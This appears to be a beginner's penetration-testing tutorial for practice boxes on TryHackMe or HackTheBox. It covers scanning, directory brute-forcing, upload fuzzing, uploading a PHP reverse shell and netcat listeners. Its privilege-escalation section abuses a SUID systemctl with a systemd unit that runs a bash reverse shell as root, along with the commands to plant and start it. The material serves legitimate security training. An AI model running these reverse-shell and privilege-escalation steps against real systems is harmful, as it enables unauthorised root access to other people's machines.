PenTest Methodology: Quick Example

This is a quick example of pentesting using boxes from TryHackMe or HackTheBox. It’s generally not that easy but the general idea is the same.

Information Gathering

Generally not required with box pwning as the information are in front of our eyes.

See What is Reconnaissance/Footprinting for more information.

Enumeration/Scanning

Port Scanning with nmap

One of the first step of a pentesting is “reconnaissance” or finding information regarding the target. To gather information about the target machine, one can use nmap, a free, open-source and powerful tool used to discover hosts and services on a computer network.

A first step toward that would be to use the following command:

nmap -sV <target_ip>

Often Used Flags

| nmap flag | Description | |===========|=====================================================================================| | -sV | Attempts to determine the version of the services running | | -p | <x> or -p- Port scan for port <x> or scan all ports | | -Pn | Disable host discovery and just scan for open ports | | -A | Enables OS and version detection, executes in-build scripts for further enumeration | | -sC | Scan with the default nmap scripts | | -v | Verbose mode | | -sU | UDP port scan | | -sS | TCP SYN port scan |

Locating Directories

OWASP DirBuster is often used to brute force your way to a list of often used directory names. We will, however, use GoBuster which is a similar but modern and fast tool written in Go.

It is available to download on Kali Linux 2020.1+: sudo apt-get install gobuster or on GitHub.

Simple command:

gobuster dir -u http://<ip>:<port> -w <word_list_location>

Note: On Kali Linux, word lists are under /usr/share/wordlists. For a quick brute force, directory-list-2.3-small.txt is a good start.

Often Used Flags

| GoBuster flag | Description | |=|=========================| | -e | Print the full URLs in your console | | -u | The target URL | | -w | Path to your word list | | -U and -P | Username and Password for Basic Auth | | -p | Proxy to use for requests | | -c <http_cookies> | Specify a cookie for simulating your auth |

Fuzz a Page

We can use Burp Suite’s “Intruder” to fuzz a website.

What we want to achieve here is test which file extension is allowed by the website.

First we need to create a list (or use one from the Enterprise edition).

We intercept the POST request used to upload file and send it to the Intruder tool. Using the “Attack type” called “Sniper”, we add our Payload to the file extension of the request.

On the “Payloads” tab, we add our list. On the “Options” tab we can use the “Grep - Match” feature to flag result items with responses matching an expression (for example “Extension not allowed”). This is helpful to quickly find which extension doesn’t return an error.

Time to start the attack!

Exploitation

Upload a Reverse Shell

There are a lot of reverse (PHP) shell out there. A famous one is from pentestmonkey although YAPS has gathered some reconnaissance as well.

Update your IP address and the port to use in the file and upload the file to the website (change file extension if necessary).

Next, use netcat to connect to listen to incoming connections:

nc -lvnp <port_num>

Privilege Escalation

Also called privesc, is the action of gaining access to root on a machine by one mean or another.

Using SUID file is a great way to gain privesc. To find SUID files, type:

find / -perm -u=s -type f 2>/dev/null

This show every SUID file type owned by root user on root file system and below. stderr (standard error) is redirected to /dev/null to prevent errors from polluting the results.

Let’s say we found binary systemctl with SUID. systemctl is used to start, stop and generally manage services. For this reason it’s best to let privilege users only be able to use it.

Create the Payload

We can craft a systemd unit file which execute a payload as root user:

[Unit]
Description=Open a shell with root

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<client_ip>/<port_1> 0>&1'

[Install]
WantedBy=multi-user.target

The User is important to let systemd we want to execute as root. Here, ExecStart is a simple one-line bash reverse shell.

<port> is the port we will use to connect later.

Upload the Payload

Next, we need to upload that payload to our server (or write it as a one liner). Once again we can use netcat for this task. On the target machine (i.e. through our reverse proxy):

nc -vl <port_2> > /tmp/rootshell.service

Folder is /tmp as it should be writable even to non root user.

From our client machine, we send the file:

nc -n <target_ip> <port_2> < rootshell.service

Connect to the Host and Gain Privesc

This is getting confusing but we need another netcat session to listen to the root shell:

nc -lvnp <port_1>

On the target machine (through the first reverse proxy) execute the payload using systemctl:

systemctl enable /tmp/rootshell.service
systemctl start rootshell.service

If you get an error like although you have an [Install] section:

The unit files have no [Install] section. They are not meant to be enabled
using systemctl.

It’s because old version of systemctl only loads services from a set of pre-defined paths. Use systemctl link /tmp/rootshell.service first to allow loading (in later version this is done automatically with enable command).

And voilà!

Post-Exploitation

Depending on the system there may be post-exploitation stages. This stage generally involves:

  • Pivoting: what other hosts can be targeted
  • What additional information can we gather from the host now that we are a privileged user
  • Covering your tracks
  • Reporting